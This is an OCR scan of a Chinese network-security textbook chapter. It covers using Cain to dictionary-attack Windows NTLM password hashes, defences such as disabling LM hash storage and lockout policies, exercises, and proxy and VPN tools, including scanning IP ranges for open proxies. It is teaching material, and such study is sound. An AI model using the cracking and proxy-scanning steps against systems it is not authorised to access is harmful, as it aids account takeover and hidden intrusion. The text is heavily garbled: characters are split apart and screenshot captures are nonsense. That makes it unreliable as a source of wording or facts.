这 里 只 介绍 Cain 对 操作 系统 口令 的 使 用 。 

具体 操作 步骤 如 下 。 

(1) Cain 的 安装 比较 简单 ,安装 后 打开 界面 。 选 择 Cracker~LM & NTLM Hashes 命 
令 , 在 打开 的 界面 中 , 单 击 右 侧 空白 处 , 单 击 工具 栏 中 的 “十 ?按钮 ,如 图 5-26 所 示 。 

(2) 导入 Windows Server 的 本 地 账户 情况 ,测试 时 把 系统 的 密码 复杂 性 策略 关闭 了 。 
选 定 账户 , 右 击 , 在 弹出 的 快捷 菜单 中 ,选择 破解 的 方法 。 如 在 “Administrator 账户 ”处 右 
击 ,在 弹出 的 快捷 菜单 中 ,选择 Dictionary Attack-~NTLM Hasher 命令 。 

(3) Cain 还 有 很 多 功能 ,如 破解 一 些 “ 自 动 记 住 密码 ”的 软件 等 。 


> 5.5.3 账户 安全 防护 和 策略 


中 1. 账户 安全 防护 
如 果 一 些 非法 入侵 者 使 用 LC 软件 破解 Windows 口令 ,给 用 户 的 网 络 安全 造成 很 大 的 
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图 5-26 Cain 导入 本 地 Hash 文件 


威胁 。 如 果 没 有 需要 LM 身份 验证 的 客户 机 , 则 应 禁用 LM 散 列 的 存储 。Windows Server 
中 提供 了 一 个 注册 表 设 置 ,可 以 禁用 LM 散 列 的 存储 。 修 改 注册 表 中 HKLM\SYSTEM\ 
CurrentControlSet\Control\Lsa 的 一 个 子 项 的 键 值 ,设置 NoLMHash 项 的 值 为 1。 

也 可 以 通过 使 用 “组 策略 ”实现 “NoLMHash" 策 略 。 选 择 “ 安 全 设置 "一 “本 地 策略 ”一 
“安全 选项 "命令 ,有 一 个 策略 是 针对 LM Hash 值 存储 设置 的 ,如 图 5-27 所 示 。 

虽然 阻止 了 针对 LM 散 列 的 攻击 ,但 是 如 果 在 LC 中 选择 NTLM 破解 ,还 是 可 以 破解 
出 来 的 ,只 是 时 间 较 长 。Windows 7 和 Windows Server 2008 以 上 系统 默认 不 保存 LM 散 列 。 


12. 账户 安全 策略 


密码 破解 软件 使 用 : 巧妙 猜测 .词典 攻击 和 自动 尝试 字符 的 各 种 可 能 的 组 合 (暴力 破 
解 )。 只 要 有 足够 的 时 间 ,密码 总 是 会 被 破解 的 。 即 使 如 此 ,破解 强 密码 一 定 是 比 破 解 弱 密 
码 更 有 困难 。 因 此 ,必须 对 所 有 用 户 账户 采用 强 密码 。 

1) Windows 强 密码 原则 

Windows 允许 127 个 字符 的 口令 ,其 中 包括 3 类 字符 。 大 小 写字 母 .数字 和 键盘 上 的 符 
号 ,如 !、@、#、 圣 、% 等 。 

一 般 来 说 , 强 密码 应 该 遵循 以 下 原则 。 

(1) 口令 应 该 不 少 于 8 个 字符 。 

(2) 同时 包含 上 述 3 类 字符 。 


一 一 一作 
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本 地 安全 策略 Tp eal 虽 习 
文件 (和 扣 作 (A) 查看 V) 帮助 (H) 
和 中 | 和 办 国 | 关 上 日 已 | 日 画 



































本 地 安全 设置 
贡 了 网络 安 全 在 下 一 次 更 改 密 码 时 不 存 依 LAN 管理 器 哈 希 值 








回 EE) 





























图 5-27 本 地 安全 策略 中 LM Hash 值 的 存储 设置 


(3) 不 包含 完整 的 字典 词汇 。 

(4) 不 包含 用 户 名 、 真 实 姓 名 ,生日 或 公司 名 称 等 。 

2) 账户 策略 

增强 操作 系统 的 安全 ,除了 启用 强壮 的 密码 外 ,操作 系统 本 身 有 账户 的 安全 策略 。 账 户 
策略 包含 密码 策略 和 账户 锁定 策略 。 在 密码 策略 中 ,设置 增加 密码 复杂 度 , 同 时 增加 了 暴力 
破解 的 难度 ,如 图 5-28 所 示 。 加 强 了 密码 的 复杂 度 及 密码 的 长 度 还 是 不 能 够 完全 抵抗 使 用 
字典 文件 的 暴力 破解 法 ,还 需要 制定 账户 锁定 策略 ,如 10 次 无 效 登 录 后 就 锁定 该 账户 ,使 字 
典 文件 的 穷 举 法 执行 不 了 。 


文件 昌 。” 提 作 (A) 喜 看 帮助 4 
和 中 | 上 四 国 |X 日 电 | 日 品 











b 惫 IP 安全 策略 , 在 本 地 计算 机 
> 国 高 级 训 核 第 略 瑟 置 














图 5-28 本 地 安全 策略 中 密码 策略 


weer 








3) 重新 命名 Administrator 账户 

由 于 Windows 的 默认 管理 员 账 号 Administrator 已 众所周知 ,该 账号 通常 成 为 攻击 者 
猜测 口令 攻击 的 对 象 。 为 了 降低 这 种 威胁 ,可 以 将 账号 Administrator 进行 重 命名 , 如 
图 5-29 所 示 。 


















































文 (KR 损人 FA) 查看 W) 帮助 (H) 
包 中 | 六 辐 | XB| 日 画 
| 至 安全 | 安全 设置 国 | 
b 蜀 帐户 第 略 没有 定义 
“ 国 本 第 略 没有 定义 
b 国 市 术 第 略 没有 定义 
bp 区 用 户 权限 分 本 BB 启用 
8 
b 男 高 级 安全 Windows 防火 过 ee 
四 网 络 列表 管理 器 策略 i 
bp 国 公 鸳 第 略 这 
b 国 软件 限制 策略 ministrator 四 
>》 国 应 用 程序 控制 策略 | ; 





图 5-29 重 命名 管理 员 账 户 


4) 创建 一 个 陷阱 用 户 

在 重新 命名 Administrator 用 户 后 ,创建 一 个 名 为 Administrator 的 本 地 用 户 , 将 其 权限 
设置 成 最 低 , 并 加 上 一 个 超 长 的 复杂 密码 ,这样 更 容易 发 现 人 侵 企图 。 

5) 禁用 或 删除 不 必要 的 账号 

除了 禁用 或 删除 不 必要 的 账号 以 外 ,还 应 该 关注 系统 中 的 新 增 用 户 。 如 用 net user 命 
令 查 看 用 户 信息 ,如 果 有 新 增 用 户 则 自动 给 管理 员 报 警 等 。 


| 5.6 课外 练习 | 课外 练习 
由 1. 选择 是 


(1) 攻击 者 入 侵 的 常用 手段 之 一 是 试图 获得 Administrator( 管 理 员 ) 账 户 的 口令 。 每 台 
计算 机 至 少 需要 一 个 账户 拥有 Administrator 权限 ,但 不 一 定 非 用 Administrator 这 个 名 称 ， 
可 以 是 8 


A. Guest B. Everyone 
C. Admin D. LifeMiniator 
(2) IP 地 址 欺骗 是 很 多 攻击 的 基础 ,之 所 以 使 用 这 个 方法 ,是 因为 IP 路 由 在 转发 IP 数 
据 包 时 ,对 IP 头 中 提供 的 不 做 任何 检查 。 
A. IP 目的 地 址 B. 源 端 口 
C. IP 源 地 址 D. 包 大 小 





第 5 章 ”Windows 操 作 系统 安全 | 








(3) Web 站 点 服务 体系 结构 中 的 B/S/D 分 别 指 浏览 器 、 和 数据 库 。 
A. 服务 器 B. 防火 墙 系统 
C. 人 入侵 检 测 系统 D. 中 间 层 


(4) 人 侵 者 通常 会 使 用 网 络 嗅 探 器 获得 在 网 络 上 以 明文 传输 的 用 户 名 和 口令 。 当 判断 
系统 是 否 被 安装 嗅 探 器 ,首先 要 看 当前 是 否 有 进程 使 网 络 接口 处 于 





A. 通信 模式 B. 混杂 模式 
C. 禁用 模式 D. 开放 模式 
(5) Windows 系统 的 安全 日 志 通 过 设置 。 
A. 事件 查看 器 B. 服务 管理 器 
C. 本 地 安全 策略 D. 设备 管理 器 
(6) Windows Server 系统 的 注册 表 根 键 是 确定 不 同文 件 后 组 的 文件 类 型 。 
A. HKEY_CLASSES_ROOT B. HKEY_USER 
C. HKEY_LOCAL_MACHINE D. HKEY_SYSTEM 


12. 填空 题 


(1) Windows Server 中 启动 服务 的 命令 是 。 

(2) Windows Server 中 需要 将 Telnet 的 NTLM 值 改 为 才能 正 
常 远程 登录 。 

(3) Windows Server 中 删除 C 盘 默 认 共 享 的 命令 是 。 

(4) Windows Server 使 用 Ctrl 十 Alt 十 Delete 组 合 键 启 动 登录 ,激活 了 
进程 。 


ls 简 答 题 

(1) Windows 系统 采用 哪些 身份 验证 机 制 ? 

(2) 简 述 系统 日 志 的 用 途 及 启用 方法 。 

(3) 简 述 远程 访问 的 安全 策略 及 实施 方法 。 

(4) 简 述 Windows Server 2008 的 常见 的 系统 进程 和 常用 的 服务 。 


14. 操作 题 


(1) 使 用 EasyRecovery 等 工具 ,尝试 恢复 从 硬盘 上 从 回收 站 清空 删除 的 文件 。 
(2) 熟练 使 用 LC7 和 Cain 软件 。 


网 络 代 理 与 VPN 技 术 





本 章 介绍 网 络 代理 服务 器 的 作用 、 分 类 和 一 般 的 使 用 方法 ,并 着 重 介绍 VPN 代理 技术 
的 定义 、 结 构 ,技术 原理 ,要 求 进行 实例 化 操作 学 习 。 


多 > 知识 点 


(1) 代理 服务 器 的 定义 。 

(2) 代理 服务 器 的 功能 、 分 类 。 
(3) VPN 的 定义 。 

(4) VPN 的 协议 。 

(5) VPN 的 使 用 。 

(6) 远程 控制 工具 的 使 用 。 


局 司 教 学 B 标 


(1) 了 解 什么 是 代理 服务 器 。 

(2) 了 解 代理 服 务 器 的 功能 、 分 类 。 

(3) 掌握 网 页 在 线 代理 的 使 用 。 

(4) 掌握 代理 猎手 的 使 用 。 

(5) 掌握 CCProxy 的 使 用 等 。 

(6) 了 解 VPN 的 功能 和 特点 。 

(7) 了 解 VPN 的 协议 。 

(8) 掌握 常用 的 VPN 的 工具 。 

(9) 掌握 VPN 客户 端 和 服务 器 的 一 般配 置 。 
(10) 掌握 常见 远程 控制 工具 的 使 用 。 


weer 








假如 一 名 远程 用 户 ,要 访问 公司 的 LAN, 需 要 VPN 或 者 代理 。 那 么 ,什么 是 VPN 和 代 
理 ? 两 者 有 何 区 别 ? 

虚拟 专用 网 (VPN) 被 定义 为 通过 一 个 公用 网 络 (通常 是 因特网 ) 建 立 一 个 临时 的 ,安全 
的 连接 ,是 一 条 穿 过 混乱 的 公用 网 络 的 安全 、 稳 定 的 隧道 。 虚 拟 专用 网 是 对 企业 内 部 网 的 
扩展 。 

代理 有 很 多 种 解释 ,而 一 般 提 到 的 代理 ,从 计算 机 专业 角度 来 说 就 是 指 代理 服务 器 相 
关 。 代 理 服务 器 (Proxy Server) 就 是 个 人 网 络 和 因特网 服务 商 之 间 的 中 间 代 理 机 构 , 它 负责 
转发 合法 的 网 络 信息 ,并 对 转发 进行 控制 和 登记 。 大 部 分 代理 服务 器 都 具有 缓冲 的 功能 ,就 
好 像 一 个 大 的 Cache, 能 显著 提高 浏览 速度 和 效率 。 

在 网 络 安全 中 如 何 用 好 代理 和 VPN 是 一 个 比较 关键 的 内 容 。 本 章 针 对 网 络 安全 中 最 
常用 的 代理 服务 器 、VPN 和 远程 控制 工具 ,进行 较 全 面 地 介绍 。 





6.1 网 络 代 理 的 概念 与 形式 


1. 网 络 代理 服务 器 的 功能 


代理 服务 器 是 建立 在 TCP/IP 应 用 层 上 的 一 种 服务 软件 。 顾 名 思 义 ,代理 服务 器 就 是 
作为 用 户 上 网 “总 代理 ”的 服务 器 。 它 一 般 安装 在 一 台 性 能 比较 好 且 装 有 网 络 通信 设备 的 机 
器 上 ,起 一 个 中 转 站 的 作用 。 用 代理 服务 器 上 网 ,本 地 机 的 所 有 网 络 请 求 都 首先 传 给 代理 服 
务 器 ,再 由 代理 服务 器 向 Internet 转发 请 求 ; 从 Internet 取得 信息 ,也 是 要 先 经 过 代理 服务 
器 ,然后 转发 给 本 地 机 。 常 用 的 应 用 场景 有 以 下 几 种 。 

(1) 黑客 。 就 网 络 安全 而 言 , 为 了 更 好 地 隐藏 自己 ,黑客 在 攻击 前 往往 会 先 找 一 些 管理 
水 平 不 高 的 网 络 主机 作为 代理 服务 器 ,再 通过 这 些 主机 攻击 目标 计算 机 。 正 是 有 了 这 些 代 
理 服 务 器 ,黑客 的 行踪 才 不 容易 被 发 现 ,这 样 黑客 就 可 以 肆 无 忌 蛋 地 实施 攻击 。 

(2) 局 域 网 。 而 一 般 来 说 ,代理 服务 器 拥有 较 大 的 缓存 。 当 本 地 机 需要 的 最 新 数据 已 
经 在 代理 服务 器 上 时 ,就 无 须 从 Internet 上 取 数 据 ,可 以 直接 将 缓存 中 的 数据 传 给 本 地 用 
户 , 节 约 了 带宽 ,提高 了 访问 速度 。 

(3) 个 人 。 对 于 个 人 非 攻 击 的 使 用 方面 .代理 服务 器 的 作用 就 是 可 以 绕 过 某 些 防 火 墙 
有 效 地 提高 上 网 效率 。 此 外 ,使 用 代理 服务 器 还 可 以 增强 上 网 的 安全 性 。 


上 2 代理 服务 器 的 分 类 


按 功 能 ,代理 服务 器 可 以 分 为 HTTP 代理 、Socks 代理 ,FTP 代理 、Telnet 代理 等 类 型 。 
不 同类 型 的 软件 要 使 用 不 同类 型 的 代理 服务 器 。 

浏览 器 软件 要 使 用 HTTP 或 Socks 代理 服务 器 ; 下 载 软件 要 使 用 HTTP、FTP 或 
Socks 代理 服务 器 ; 上 传 主页 要 使 用 FTP 或 Socks 代理 服务 器 ; 收 邮件 等 要 使 用 Socks 代 
理 服务 器 。 
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1a. 在 IE 中 设置 代理 上 网 


(1) 搜索 可 用 的 代理 IP 地 址 信息 ,如 24. 172. 34. 114:8181 。 

(2) 打开 IE 的 “Internet 选项 ”对 话 框 。 

(3) 选择 “连接 ”选项 卡 , 单 击 “ 局 域 网 设置 "按钮 。 

(4) 选中 *LAN 使 用 代理 服务 器 " 复 选 框 。 然 后 在 第 一 个 地 址 文本 框 输入 24. 172. 34. 114， 
第 二 个 文本 框 中 输入 端口 号 8181, 单 击 “ 确 定 ” 按 钮 , 回 到 “Internet 选项 ”对 话 框 , 单 击 “ 确 
定 ” 按 钮 ,如 图 6-1 所 示 。 








自动 配置 
mF 要 确保 使 用 手动 设置 ， 请 禁用 自动 配 
加 自动 检测 设置 &) 
四 使 用 自动 配置 灶 本 人) 
地 址 @@) [ ] 
























对 于 本 地 地 址 不 使 用 代理 服务 器 @) 

















图 6-1 在 了 FE 中 设置 网 络 代理 服务 


打开 I 下 浏览 器 ,测试 出 IP 地 址 已 经 是 代理 服务 器 的 地 址 , 则 表示 代理 有 效 。 当 然 , 代 
理 也 分 透明 代理 和 匿名 代理 ,在 使 用 时 也 要 注意 。 


4. 代理 服务 器 的 类 型 


对 于 代理 服务 器 ,不 要 有 这 样 的 误解 : 只 要 使 用 代理 ,就 能 隐藏 本 机 的 IP 地 址 。 

如 果 从 隐藏 使 用 代理 用 户 的 级 别 上 划分 ,代理 可 以 分 为 三 种 , 即 高 度 匿 名 代理 、 普 通 匿 
名 代理 和 透明 代理 。 

(1) 高 度 匿名 代理 不 改变 客户 机 的 请 求 , 这 样 在 服务 器 看 来 就 像 有 个 真正 的 客户 浏览 
器 在 访问 它 ,这 时 客户 的 真实 IP 地 址 是 隐藏 的 ,服务 器 端 不 会 认为 用 户 使 用 了 代理 。 

(2) 普通 匿名 代理 能 隐藏 客户 机 的 真实 IP 地 址 ,但 会 改变 用 户 请 求 信息 ,服务 器 端 有 可 
能 会 认为 用 户 使 用 了 代理 。 不 过 使 用 这 种 代理 时 ,虽然 被 访问 的 网 站 不 能 知道 客户 端的 IP 
地 址 ,但 仍然 可 以 知道 用 户 在 使 用 代理 ,当然 某 些 能 够 侦 测 IP 的 网 页 仍然 可 以 查 到 用 户 的 
IP 地 址 。 

(3) 透明 代理 , 它 不 但 改变 了 用 户 的 请 求 信息 ,还 会 传送 真实 的 IP 地 址 。 

三 者 隐藏 使 用 代理 者 身份 的 级 别 依次 为 高 度 匿名 代理 最 隐蔽 ,其 次 是 普通 匿名 代理 ,最 
差 的 是 透明 代理 ,如 表 6-1 所 示 。 
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表 6-1 用 户 开 地 址 三 个 属性 的 区 别 





用 户 耳 状态 


比较 属性 值 





没有 使 用 代理 服务 器 


REMOTE_ADDR = 用 户 IP 
HTTP_VIA 一 没 数值 或 不 显示 (通知 中 间 网 关 或 代理 服务 器 地 址 ) 
HTTP_X_FORWARDED_FOR == 没 数值 或 不 显示 





使 用 透明 代理 服务 器 


REMOTE_ADDR 一 最 后 一 个 代理 服务 器 IP 

HTTP_VIA 一 代理 服务 器 IP 

HTTP_X_FORWARDED_FOR 一 用 户 IP, 经 过 多 个 代理 服务 器 时 ,这 个 值 类 
似 : 203. 98. 182. 163，203. 98. 182. 163，203. 129. 72. 215 





使 用 普通 匿名 代理 服务 器 


REMOTE_ADDR = 最 后 一 个 代理 服务 器 IP 

HTTP_VIA = 代理 服务 器 IP 

HTTP_X_FORWARDED_FOR = 代理 服务 器 IP, 经 过 多 个 代理 服务 器 时 ,这 
个 值 类 似 : 203. 98. 182. 163，203. 98. 182. 163，203. 129. 72. 215 





使 用 欺骗 性 代理 服务 器 


REMOTE_ADDR = 代理 服务 器 IP 

HTTP_VIA = 代理 服务 器 IP 

HTTP_X_FORWARDED_FOR = 随机 的 IP, 经 过 多 个 代理 服务 器 时 ,这 个 值 
类 似 : 203. 98. 182. 163，203. 98. 182. 163，203. 129. 72. 215 





使 用 高 匿名 代理 服务 器 





REMOTE_ADDR = 代理 服务 器 IP 

HTTP_VIA == 没 数值 或 不 显示 

HTTP_X_FORWARDED_FOR == 没 数值 或 不 显示 ,经 过 多 个 代理 服务 器 时 ， 
这 个 值 类 似 : 203. 98. 182. 163，203. 98. 182. 163，203. 129. 72. 215 


6.2 代理 服务 器 软件 的 使 用 


针对 网 络 安全 方面 ,代理 服务 器 可 用 于 局 域 网 与 Internet 连接 时 共享 上 网 ,而 黑客 则 可 
通过 代理 服务 器 软件 对 某 台 计算 机 进行 扫描 ,从 而 截获 目标 主机 的 重要 信息 ,以 达到 入 侵 的 


目的 。 


j 6.2.1 代理 猎手 的 使 用 


代理 猎手 是 一 款 集 搜索 与 验证 于 一 体 的 软件 ,可 以 快速 查找 网 络 上 的 免费 Proxy。 其 
主要 特点 为 支持 多 网 段 、 多 端口 自动 查询 ; 支持 自动 验证 并 给 出 速度 评价 ; 支持 后 续 的 时 间 
预测 ; 支持 用 户 在 不 影响 其 他 网 络 程序 的 前 提 下 ,设置 最 大 连接 数 ,并 自动 查找 最 新 版 本 ， 
最 大 的 特点 是 搜索 速度 快 ,最 快 可 以 在 十 几 分 钟 搜索 完整 个 B 类 IP 地 址 的 65 536 个 地 址 。 

代理 猎手 可 以 通过 百度 ,新浪 等 搜索 引擎 查找 并 进行 下 载 。 


1. 添加 搜索 任务 


在 代理 猎手 安装 完毕 后 ,还 需要 添加 相应 的 搜索 任务 ,具体 的 操作 步骤 如 下 。 
(1) 启动 程序 ,选择 “添加 搜索 任务 ”选项 ,注意 选择 任务 类 型 。 
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(2) 添加 并 设置 他 地址 范围 ,如 图 6-2 所 示 。 或 打开 已 预 设 IP 地 址 范围 的 * .ipr 文 件 。 
i ED 











地 HEE 国 [3 
选取 已 定 义 的 范 园 |。 主机 IP《- 域名。 | 。 查询 本 机 | 


| 

| ~ 修改 
we | 

i 消除 


《上 -- 步 g)| 下 - 步 m ?| 。 取消 _] 半 助 

















图 6-2 设置 IP 地 址 范围 
(3) 打开 “端口 和 协议 ”界面 ,根据 实际 情况 选择 端口 ,完成 搜索 任务 的 设置 ,如 图 6-3 所 示 。 











» 




















《< 上 一 步 @)| _ 庄 成 取消 帮助 


图 6-3 设置 端口 和 协议 


中 2. 设置 参数 

在 设置 好 搜索 的 IP 地 址 之 后 .就 可 以 开始 进行 搜索 了 .但 为 了 提高 搜索 效率 ,还 有 必要 
设置 一 些 参 数 。 具 体操 作 步 又 如 下 。 

(1) 在 代理 猎手 窗口 中 ,选择 “系统 >“ 参数 设置 "命令 .选中 “启用 先 Ping 后 连 的 机 制 ” 
复 选 框 。 要 注意 Ping 的 并 发 数量 要 考虑 用 户 的 带宽 ,如 相应 的 设置 为 50 或 100, 以 减轻 网 
络 的 实际 负担 。 
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(2) 在 验证 数据 设置 中 ,可 添加 、 修 改 和 删除 验证 资源 地 址 及 其 参数 。 
(3) 设置 代理 调度 参数 及 代理 调度 范围 。 
(4) 在 其 他 设置 中 ,设置 拨号 ,搜索 验证 历史 等 选项 后 ,确定 参数 ,如 图 6-4 所 示 , 并 开始 搜索 。 


搜索 验证 设置 | 验证 数据 设置 | 代理 调度 设置 其 它 设置 | 
拨号 设 轩 
厂 使 用 拨号 网 络 反 邮 线 自 动 重兵 






































图 6-4 代理 猜 手 参数 设置 


ls. 查看 搜索 结果 


在 搜索 完成 后 ,就 可 以 查看 搜索 结果 ,具体 的 操作 步骤 如 下 。 
(1) 查看 搜索 结果 的 验证 状态 为 Free 的 代理 , 即 为 可 以 使 用 的 代理 服务 器 。 一 般 情 况 
下 只 要 验证 状态 为 Good 的 就 可 以 使 用 了 ,如 图 6-5 所 示 。 


[本 fm 
系统 (5) 搜索 任务 (]， 搜索 结果 (R) 代 还 风度 (J) 辅助 工具 (P) 窗口 W) 帮助 (HD) 


[alDaaGlaDI 


搜索 任务 “搜索 结果 | 代理 调度 | 



























































搜索 结果 1 个 被 选中 ] 
| 强 证 拓 态 “ 验证 
ola elu mE | 
0.0| 0.2| 0.2 添加 结果 ] 
188. 1 21323 |HTTP | 要 室 码 0.0| 0.2| 0.2 
192. 168. 1.10 加 Ee | 无 法 确定 0olooloo | 修改 结果 
192.165.1.10 135 “|mTP 0.0| 0.0|20.0 人 
192. 168.1.10 139 |im1P ee 0.0| 0.0| 0.0 果 
192. 168. 1. 10 1025 |ITTP | 验证 超时 0.0| 0.0|20.0 精简 结果 
192. 168.1.10 1028 |iTIP o.0lo.0lzo0 | 
192.188.1.10 1031 |iTTP I 0.0| 0.0|lz00 | 导出 结果 | 
192. 188.1.10 1032 |iTTP | 验证 超时 0.0| 0.0|20.1 导入 结果 
192 .168.1.10 1099 |ITTP | 验证 超时 0.0| 0.0|20.0 
192.168.1.10 1075_|HTTP | 验证 超 时 00100lz02 | ~ 
| 


























党 庆 连 访 192.168.1.15:14979(H [总 共 100 个 并 发 对 象 100 个 和 |S 13:05:13 |52% |E 13:41:28 |N 13:24:25 
6-5 ”搜索 结果 
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(2) 将 找到 的 可 用 代理 服务 器 复制 下 来 ,代理 猜 手 可 以 自动 为 服务 器 进行 调度 。 或 者 
用 户 也 可 以 将 搜索 到 的 可 用 代理 服务 器 的 IP 地 址 和 端口 号 输入 网 页 浏览 器 的 代理 服务 器 
设置 选项 中 ,进行 代理 上 网 ,如 图 6-6 所 示 。 


三 人 手 
系统 (5) 搜索 任务 (D。 搜 索 结果 (R) ”代理 调度 (U) 急 助 工具 (P) 窗口 (W) 帮助 (H) 


panaaglag 















































92.1580.25540800f | 入 并 100 个 并 波 对 这 100 个 12:33:30 99XE123601 |N 1236502 | 


图 6-6 ”代理 猎手 代理 服务 器 的 使 用 


PP 6.2.2 在 线 代理 


在 线 代 理 (Web Proxy Server) 的 功能 就 是 代理 网 络 用 户 去 取得 网 络 信息 。 形 象 地 说 : 
它 是 网 络 信息 的 中 转 站 。 在 一 般 情 况 下 ,使 用 网 络 浏览 器 直接 去 连接 其 他 Internet 站 点 取 
得 网 络 信息 时 , 须 送出 Request 信号 来 得 到 回答 ,然后 对 方 再 把 信息 传送 回来 。 

代理 服务 器 是 介 于 浏览 器 和 Web 服务 器 之 间 的 一 台 服 务 器 ,有 了 它 之 后 ,浏览 器 不 是 
直接 到 Web 服务 器 去 取 回 网 页 而 是 向 代理 服务 器 发 出 请 求 ,Request 信号 会 先 送 到 代理 服 
务 器 ,由 代理 服务 器 来 取 回 浏览 器 所 需要 的 信息 并 传送 给 浏览 器 。 而 且 , 大 部 分 代理 服务 器 
都 具有 缓冲 的 功能 ,就 好 像 一 个 大 的 Cache, 它 有 很 大 的 存储 空间 , 它 不 断 将 新 取得 的 数据 储 
存 到 它 本 机 的 存储 器 上 ,如果 浏览 器 所 请 求 的 数据 在 它 本 机 的 存储 器 上 已 经 存在 而 且 是 最 
新 的 ,那么 它 就 不 必 重 新 从 Web 服务 器 取 数 据 , 而 直接 将 存储 器 上 的 数据 传送 给 用 户 的 浏 
览 器 ,这 样 就 能 显著 提高 浏览 速度 和 效率 。 

目前 ,国内 在 线 代 理 的 资源 很 少 。 虽 然 使 用 很 方便 ,但 要 注意 以 下 几 点 。 

(1) 在 线 代理 虽然 可 以 访问 大 部 分 网 站 ,但 是 并 不 能 保证 所 有 的 网 站 都 是 可 以 访问 的 。 

(2) 有 一 些 在 线 代 理 也 支持 安全 连接 (https) ,但 是 最 好 不 要 用 在 线 代 理 访 问 涉及 个 人 
隐私 的 网 站 。 

(3) 使 用 在 线 代理 的 速度 会 比 正常 的 上 网 速度 慢 ,即使 代理 网 站 的 效率 很 高 。 

(4) 由 于 架设 在 线 代理 最 主要 的 目的 是 赚钱 、 支 付 网 页 寄存 费用 ,在 线 代 理 网 站 刊登 的 
广告 非常 多 。 


@— 


weer 








在 支持 在 线 代 理 的 网 页 中 输入 网 址 ,并 选择 代理 服务 器 ,如 图 6-7 所 示 。 








ip138.com 访问 浏览 | 请 先 选择 要 使 用 的 服务 器 
选择 服务 器 :| 服务 器 1. 美 国 | 小 贴 士 : 由 于 国内 网 络 线路 复杂 ,请 尝试 不 同 的 服务 器 以 获得 最 佳 的 访问 速度 . 

















图 6-7 在 线 代 理 的 使 用 
结果 显示 网 址 为 美国 ,如 图 6-8 所 示 。 





www. ip138. com IP 查 询 ( 搜 索 IP 地 址 的 地 理 位 置 ) 





您 的 IP 是 ，[66. 117. 9. 46] 来 自 , 美国 











IDC 公司 大 全 | IP 查 询 公 测 接口 





图 6-8 IP 地 址 查询 的 结果 


> 6.2.3 CCProxy 的 使 用 


CCProxy 国产 代理 服务 器 软件 。 主 要 用 于 局 域 网 内 共享 宽带 上 网 ,ADSL 共享 上 网 、 专 
线 代 理 共 享 .ISDN 代理 共享 .卫星 代理 共享 .蓝牙 代理 共享 和 二 级 代理 等 共享 代理 上 网 。 

具体 操作 步骤 如 下 。 

(1) 打开 软件 主 界面 ,选择 “设置 "选项 ,设置 内 容 如 图 6-9 所 示 。 





口 新 闻 be ] 


这 里 设置 本 机 局 域 网 IP 地 址 ， 
一 般 建 议 两 个 IP 地 址 ， 
-个 对 外 ， 一 个 对 内 





图 6-9 CCProxy 设置 


选中 以 上 复 选 框 。 端 口 保持 默认 即 可 。 建 议 在 用 作 代 理 服务 器 的 主机 上 安装 两 块 网 
卡 ,一块 对 外 ,一 块 对 内 。 然 后 单 击 眉 按钮 ,进入 端口 映射 设置 界面 。 
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(2) 设置 完 目 标 地 址 、 目 标 端口 、 端 口 类 型 .本 地 端口 后 , 单 击 “ 增 加 ”按钮 即 可 ,也 可 以 
根据 以 上 的 格式 进行 设置 。 然 后 单 击 “ 确 定 ” 按 钮 返回 设置 界面 。 

(3) 在 图 6-9 中 , 单 击 “ 高 级 ”按钮 进行 设置 。 其 中 ,可 设置 “缓存 ”选项 ,选中 “总 是 从 缓 
存 里 读 取 ” 复 选 框 ,这 样 可 以 省 略 不 必要 的 带宽 

(4) 在 软件 主 界面 ,选择 账号 项 ,进入 账号 设置 界面 ,可 进行 账号 的 相关 权限 管理 。 也 
可 以 配合 带 有 域 的 网 络 来 使 用 ,选中 下 面 的 * 域 用 户 验证 ? 复 选 框 ,在 后 面 输入 域名 即 可 ,如 
图 6-10 所 示 。 








192168.12199 00e04c4a3364 

19216812193 000461684e50 15 22000 
192168.1268 000aeb031c24 15 22000 
1921681277 001cc0a436ee -1 1 
192168.12143 O00aeb2550a6 ”12 32000 
1921681245 00e04c95ba9 15 22000 
19216812100 00147881860a 15 22000 
19216812215 0019e0201dle 15 22000 
1921681245 00196621d4ad 15 22000 




















图 6-10 CCProxy 账号 管理 


在 允许 范围 可 选择 “允许 所 有 /允许 部 分 ”两 个 选项 ,验证 类 型 可 以 根据 自身 的 需要 进行 
选择 ,这 里 以 选择 “MAC 地 址 ”验证 为 例 。 右 侧 是 用 户 的 相关 选项 ,可 以 新 建 , 编 辑 、 删 除 、 导 
出 、 导 入 用 户 等 ,推荐 新 建 好 用 户 后 . 单 击 “ 全 选 ” 按 钮 ,然后 单 击 “ 导 出 ”按钮 ,把 整个 用 户 账 
号 信息 做 个 备份 ,以 防 万 一 。 单 击 “ 网 站 过 滤 ” 按 钮 ,可 设置 网 站 过 滤 的 相关 信息 。 

可 以 设置 多 个 时 间 安排 模板 ,也 可 以 设置 多 个 时 间 段 控制 , 单 击 旁 边 的 “时 间 安 排 按 
钮 ,进行 时 间 自 选择。 设置 完成 后 单 击 “ 新 建 "按钮 或 “保存 "按钮 。 

(5) 返回 主 界面 , 单 击 “监控 ”按钮 可 对 网 络 内 所 有 用 户 的 使 用 情况 进行 监控 。 


j* 6.2.4 用 SocksCap32 设置 动态 代理 


SocksCap32 代理 软件 是 一 款 基于 Socks 协议 的 网 络 代 理 客户 端 软件 , 它 能 将 指定 软件 
的 任何 Winsock 调用 转换 成 Socks 协议 的 请 求 ,并 发 送 给 指定 的 Socks 代理 服务 器 。 
SocksCap32 可 用 于 使 基于 HTTP、FTP、Telnet 等 协议 的 软件 ,通过 Socks 代理 服务 器 连接 
到 目的 地 。 
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使 用 SocksCap32 软件 前 ,需要 先 有 一 个 Socks 代理 服务 器 。 


有 1. 建立 应 用 程序 标识 


当 第 一 次 运行 SocksCap32 程序 时 ,将 显示 “SocksCap 许可 ”对 话 框 。 在 单 击 “ 接 受 ” 按 
钮 接受 许可 协议 内 容 之 后 ,才能 进入 SocksCap32 的 主 窗口 。 具 体操 作 步 又 如 下 。 

(1) 单 击 “ 新 建 " 按 钮 ,在 “标识 项 名 称 ”文本 框 中 输入 新 建 标识 项 名 称 。 

(2) 单 击 “浏览 ?按钮 , 选 定 需要 代理 的 应 用 程序 。 添 加 的 应 用 程序 可 以 是 E-mail 工具 、 
FTP 工具 、Telnet 工具 以 及 网 络 游戏 等 。 如 图 6-11 所 示 为 添加 成 功 后 的 界面 。 


12. 设置 选项 


设置 SocksCap32 选项 的 具体 操作 步骤 如 下 。 

(1) 主 界面 下 ,选择 "文件 ”一 设置” 命令。 在 “Socks 设置 选项 卡 中 对 服务 器 及 协议 进 
行 设置 ,如 图 6-12 所 示 。 如 用 户 查 找 的 代理 服务 器 需要 用 户 名 和 密码 , 且 已 获得 该 用 户 名 
